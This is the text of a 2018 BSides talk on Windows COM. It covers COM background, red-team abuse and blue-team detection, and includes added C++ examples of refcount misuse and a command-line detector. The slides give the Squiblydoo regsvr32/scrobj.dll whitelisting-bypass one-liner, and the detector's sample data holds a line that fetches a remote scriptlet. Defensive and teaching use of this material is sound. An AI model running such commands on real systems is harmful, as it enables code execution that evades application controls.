BSIDES IOWA 2018
ANDREW FREEBORN
WINDOWS COM: RED VS BLUE
NEW PHONE; WHO DIS
▸ IT Internal Audit Manager, Red Team at ACI Worldwide
▸ Previously: Red Team, Pen Tester, IT
▸ @maendarb
▸ https://vivirytech.blogspot.com
▸ There will be pictures, minimal C++
AGENDA
▸ COM background
▸ Red: COM exploitation
▸ Blue: COM defense
SURPRISE, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
WHAT’S THIS WINDOWS COM THING?
▸ Stands for “Component Object Model”
▸ Designed in the 90s to be interoperable, portable
▸ It’s old; great books aren’t digital
▸ Not a “Shell” like CMD or PowerShell
▸ “Like” .NET and WMI
▸ Why am I so interested in this?
WHAT’S THIS WINDOWS COM THING? RULE #1: WE DON’T SPEAK ABOUT COM
▸ Used everywhere in Windows
▸ When a user copies files, embeds Excel within Word
▸ It’s abstracted away with GUIs, .Net, APIs, and no one acknowledges that COM objects are being used
COM BACKGROUND: COM LIVES EVERYWHERE
▸ Obligatory COM history
▸ Precursor to .NET
▸ Meant to solve problems developers had with things like DLLs
▸ There are so many COM objects, and they won’t go away
▸ OLE and ActiveX fit in here
▸ OLE (Object Linking and Embedding) lets you embed things (e.g. Excel sheet inside Word)
▸ ActiveX lets Internet Explorer make bad life choices
COM BACKGROUND: COM ON PAPER IS SUPER EASY TO WORK WITH
▸ Access COM things thru interfaces and objects
▸ Scripting.FileSystemObject
▸ IPersist
▸ IFileOperation
▸ WScript.Shell
http://compinfopro.com/enable-remote-desktop-enable-rdp/
COM BACKGROUND: COM MAKES YOU WORK FOR IT
▸ COM is a hot mess
COM BACKGROUND: IT’S LIKE COM MAKES UP THE RULES AS IT GOES ALONG
▸ COM is a hot mess and can live in:
▸ Windows Registry
▸ Windows made a special registry hive
▸ HKCR (HKEY_CLASSES_ROOT)
▸ Combines HKLM and HKCU
▸ Threading / InProcServer32
▸ Manifest files (COM scriptlets; Registration free too!)
COM BACKGROUND: COM MAKES YOU WORK FOR IT
▸ WScript.Shell demo
COM BACKGROUND: COM+
ZeroSum tweeted about a COM+ scriptlet, but how would you know it’s COM+ and not COM?
COM BACKGROUND: COM+ SCRIPTLET? (MOST LIKELY IT WAS JUST COM)
▸ Scriptlets come in both COM and COM+ flavors
▸ They allow you to have COM scripts to do non-malicious things like open calculator and cmd shells
▸ Did you know you can create COM objects from a Java class? Good thing no one has a JRE installed.
https://msdn.microsoft.com/en-us/library/ms524620(v=vs.90).aspx
HAX: REGSVR32 /S /N /U /I:BACKDOOR-MINIMALIST.SCT SCROBJ.DLL
▸ subTee example: COM manifest file
▸ Demo!
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
COM BACKGROUND: BREAKING DOWN THAT REGSVR32 HAX
▸ regsvr32 is used to register many things in the registry
▸ /s runs it silently, /n says to not call DllRegisterServer
▸ /u specifies which COM server to uninstall
▸ /i calls DllInstall of the COM object to register
▸ Can be pointed to a file on your system
▸ Can be a URL (http: COM moniker)
▸ Could even be a Java class (java: COM moniker)
▸ scrobj.dll makes the magic go
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
COM BACKGROUND: COM+
▸ COM+ meant to solve the problems in COM like:
▸ Quickly implement common configurations for COM components like security boundaries
▸ Load DLLs into processes on demand
▸ Managed methods to manage COM components
▸ Multi-pass… err.. threading
▸ Slick GUI
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
COM BACKGROUND: COM+
▸ COM+ also came with rad icons in the GUI
▸ Demo!
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683512(v=vs.85).aspx
COM BACKGROUND: DCOM
▸ DCOM is “Distributed COM”
▸ “Helps you” in COM and COM+ with distributed transactions
▸ Slings COM object data typically with RPC
▸ Likes to make assumptions you know what you’re doing with security and marshaling data
▸ James Forshaw and Matt Nelson have been finding problems with Windows and apps marshaling data
▸ DCOM lateral movement script (enigma0x3)
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
COM BACKGROUND: .NET TO COM (BECAUSE LEGACY APPS AND SADNESS)
▸ .NET can work with COM for interoperability
▸ “The Runtime Callable Wrapper (RCW) is a mechanism that promotes transparent communication between COM and the managed programming model.”
https://msdn.microsoft.com/en-us/library/office/bb610378.aspx
COM BACKGROUND: BREAKING DOWN THAT SWEET RCW GOODNESS
▸ This is what PowerShell uses to call into COM objects
https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/ComInterop/ComObject.cs
COM BACKGROUND: COM TO .NET (BUT WHY WOULD YOU DO THIS)
▸ COM can work with .Net thru COM Callable Wrappers
▸ “When a COM client calls a .NET object, the common language runtime creates the managed object and a COM callable wrapper (CCW) for the object. Unable to reference a .NET object directly, COM clients use the CCW as a proxy for the managed object.”
https://msdn.microsoft.com/en-us/library/f07c8z1c(v=vs.85).aspx
COM BACKGROUND: DEEP TECHNICAL DETAIL OF THAT MAGIC
▸ James Forshaw talked about .Net and COM interoperability at DerbyCon 2017
▸ IronGeek Link: ig2.me/pZ
COM BACKGROUND: THE DEEPER YOU GO, THE MORE C/C++ YOU’LL KNOW
▸ To dig in more, you’re going to have to know C, C++
https://blogs.msdn.microsoft.com/oldnewthing/20040205-00/?p=40733
COM EXPLOITATION: KNOWING THE C++ STORY CAN BE HELPFUL
▸ QueryInterface is how you query… for interfaces
▸ This is how you figure out what interfaces are available to you
▸ AddRef / Release may be important to you eventually
▸ Important if you want to partake in bug bounties :)
▸ This dictates the object lifetime by reference count
▸ Abusing the reference count introduces other avenues of attack (cough Use After Free)
▸ If open redirects are still around, we should fix those first
https://blog.zsec.uk/cve-2017-3528/
COM EXPLOITATION: USE AFTER FREE HAS ALWAYS BEEN AN ISSUE
▸ Raymond Chen talked about this in 2004
▸ Exploit DB has stuff on AddRef being misused
https://blogs.msdn.microsoft.com/oldnewthing/20040406-00/?p=39903
https://www.exploit-db.com/exploits/41042/
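The AddRef/Release contract from the C++ slide, and the kind of misuse the use-after-free slide refers to, as an added example that is not from the talk: a Windows-free mock of IUnknown so it builds anywhere; the IID values, the Greeter class and the g_liveObjects counter are assumptions made for the demonstration.

```cpp
using HRESULT = long;                       // mock of the Windows types
constexpr HRESULT S_OK = 0, E_NOINTERFACE = 0x80004002L;
using IID = int;                            // stand-in for a GUID (assumed)
constexpr IID IID_IUnknown = 0, IID_IGreeter = 1;

struct IUnknown {                           // mock of the real interface
    virtual HRESULT QueryInterface(IID iid, void** out) = 0;
    virtual unsigned long AddRef() = 0;
    virtual unsigned long Release() = 0;
    virtual ~IUnknown() = default;
};
struct IGreeter : IUnknown { virtual int Greet() = 0; };

static int g_liveObjects = 0;               // lets a test observe destruction

class Greeter : public IGreeter {           // assumed sample coclass
    unsigned long refs_ = 1;                // creator holds the first reference
public:
    Greeter()  { ++g_liveObjects; }
    ~Greeter() override { --g_liveObjects; }
    HRESULT QueryInterface(IID iid, void** out) override {
        if (iid != IID_IUnknown && iid != IID_IGreeter) { *out = nullptr; return E_NOINTERFACE; }
        *out = static_cast<IGreeter*>(this);
        AddRef();                           // QI hands out a new reference
        return S_OK;
    }
    unsigned long AddRef() override { return ++refs_; }
    unsigned long Release() override {
        unsigned long r = --refs_;
        if (r == 0) delete this;            // last reference: object dies
        return r;
    }
    int Greet() override { return 42; }
};

// Correct use: every AddRef/QueryInterface is balanced by one Release.
bool balanced_lifetime() {
    IGreeter* g = new Greeter();            // refcount 1
    void* raw = nullptr;
    g->QueryInterface(IID_IGreeter, &raw);  // refcount 2
    static_cast<IGreeter*>(raw)->Release(); // refcount 1, still alive
    bool alive = (g_liveObjects == 1) && (g->Greet() == 42);
    return g->Release() == 0 && alive && g_liveObjects == 0;
}

// The bug from the Raymond Chen post: a pointer copied without AddRef,
// then Released. The object is gone while `still_used` still points at it;
// dereferencing it afterwards would be the use-after-free.
bool premature_release_leaves_dangling() {
    IGreeter* still_used = new Greeter();   // refcount 1
    IGreeter* copy = still_used;            // copied without AddRef (bug)
    copy->Release();                        // refcount 0, object deleted
    return g_liveObjects == 0;              // still_used now dangles
}
```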
COM EXPLOITATION: COM, THE NEVER-ENDING STRUGGLE BUS
▸ Microsoft is still fixing COM related issues
▸ CVE-2018-0880/0882 ; Forshaw - A Bridge Too Far
▸ Researched by Haifei Li, Mark Dowd, James Forshaw
▸ Links posted on https://vivirytech.blogspot.com
▸ COM has a recurring theme at conferences: forgotten/“rediscovered”, but still broke (lulz)
▸ Kinda like Adobe issues, right?
COM EXPLOITATION: WHAT ARE FUN WAYS COM HAS BEEN EXPLOITED?
▸ How is COM exploited?
▸ UACMe
▸ James Forshaw
▸ Casey Smith
▸ Matt Nelson
COM EXPLOITATION: WHAT TOOLS CAN I USE TO LEARN MORE? ALL FREE!
▸ Microsoft Process Explorer
▸ Find medium to high integrity attack paths
▸ ReactOS
▸ James Forshaw OleViewDotNet (github.com/tyranid/oleviewdotnet)
▸ See the COM goodies in Windows
▸ Find new unexplored attack COM paths!
WINDOWS COM, MICROSOFT’S GIFT TO THE RED TEAM
▸ Holy attack surface Batman! Thanks OleViewDotNet!
▸ 3,592 ways to see if you can discover a new attack path
WHAT HAPPENS WHEN I PRESS THIS BUTTON?
▸ Hey kid, wanna crash something? (this can peg your CPU)
▸ Watch with Process Monitor for potential attack paths
https://github.com/FuzzySecurity/DefCon25
fondue.exe may be a privilege escalation path
WE NEED THE BLUE TEAM, AND THEY NEED US
▸ There’s a lot of fun things that leverage COM
▸ ZeroSum’s Koadic: COM C&C
▸ MITRE’s ATT&CK framework
▸ @SubTee tweets (seriously)
▸ We need to use their research to our gain
▸ Run things like Squiblydoo to see EDR response
▸ Work with the product groups and blue team
▸ See how these products trigger IOCs and act
BLUE TEAM FUN!
▸ Are you running Windows 10 RS4 / Windows Server 2016?
▸ SpecterOps Device Guard configs / guide
▸ Are you doing PowerShell cmdline audit AND reviewing?
▸ Users probably don’t run PowerShell; if they do, use v5+
▸ Pick up on keywords like “-COMObject”
▸ Do you really need wscript and cscript enabled?
▸ It can be done, ask @fpieces, he’s done it
▸ Deters attacks leveraging DotNetToJScript
▸ Investigate the potential of Sysmon and Project VAST
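A triage check for the two command-line patterns this slide and the earlier regsvr32 breakdown call out (PowerShell “-COMObject” use, and regsvr32 loading scrobj.dll with an /i: scriptlet, the Squiblydoo shape), as an added example that is not from the talk; the classify/scan functions and the Sysmon-style lines are constructed for illustration.

```cpp
#include <algorithm>
#include <cctype>
#include <string>
#include <utility>
#include <vector>

static std::string lower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return s;
}
static bool contains(const std::string& hay, const std::string& needle) {
    return hay.find(needle) != std::string::npos;
}

// Returns a short tag for the detection that fired, or "" if none.
std::string classify(const std::string& cmdline) {
    const std::string c = lower(cmdline);
    // Squiblydoo shape: regsvr32 ... /i:<scriptlet> ... scrobj.dll
    // (/s /n /u are optional; switch order and case vary, so match loosely).
    if (contains(c, "regsvr32") && contains(c, "scrobj.dll") && contains(c, "/i:")) {
        if (contains(c, "/i:http"))
            return "regsvr32-scrobj-remote";   // scriptlet fetched via http: moniker
        return "regsvr32-scrobj-local";
    }
    // PowerShell creating COM objects: the "-COMObject" keyword from the slide.
    if ((contains(c, "powershell") || contains(c, "pwsh")) && contains(c, "-comobject"))
        return "powershell-comobject";
    return "";
}

// Walk constructed Sysmon-style "CommandLine:" lines and collect (index, tag) hits.
std::vector<std::pair<int, std::string>> scan(const std::vector<std::string>& lines) {
    std::vector<std::pair<int, std::string>> hits;
    for (size_t i = 0; i < lines.size(); ++i) {
        std::string tag = classify(lines[i]);
        if (!tag.empty()) hits.emplace_back(static_cast<int>(i), tag);
    }
    return hits;
}

const std::vector<std::string> kSampleLines = {   // constructed, not real telemetry
    "CommandLine: regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll",
    "CommandLine: \"C:\\Windows\\System32\\regsvr32.exe\" /s vendor.dll",
    "CommandLine: powershell.exe -NoP -Command New-Object -ComObject WScript.Shell",
    "CommandLine: cscript.exe //nologo C:\\scripts\\inventory.vbs",
    "CommandLine: REGSVR32 /U /I:C:\\Users\\Public\\a.sct SCROBJ.DLL",
};
```

The java: moniker mentioned in the breakdown slide would need its own branch; this check only covers the file and http: cases the slide walks through.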
IT’S ALMOST TIME TO GO, LET’S REVIEW QUICKLY
▸ COM is everywhere, just as it was ~20 years ago
▸ Lots of things not covered like “TreatAs” and monikers
▸ Many “exploits” are just abusing design decisions
▸ More research and community-made tools will (most likely) bring to light more COM exploits and wreckage
▸ Other organizations also add their own COM objects
▸ Sad face:
LEARN MORE AND CONTACT ME BELOW
▸ For more info about COM:
▸ https://vivirytech.blogspot.com
▸ @maendarb
▸ Slack: https://omasec.herokuapp.com
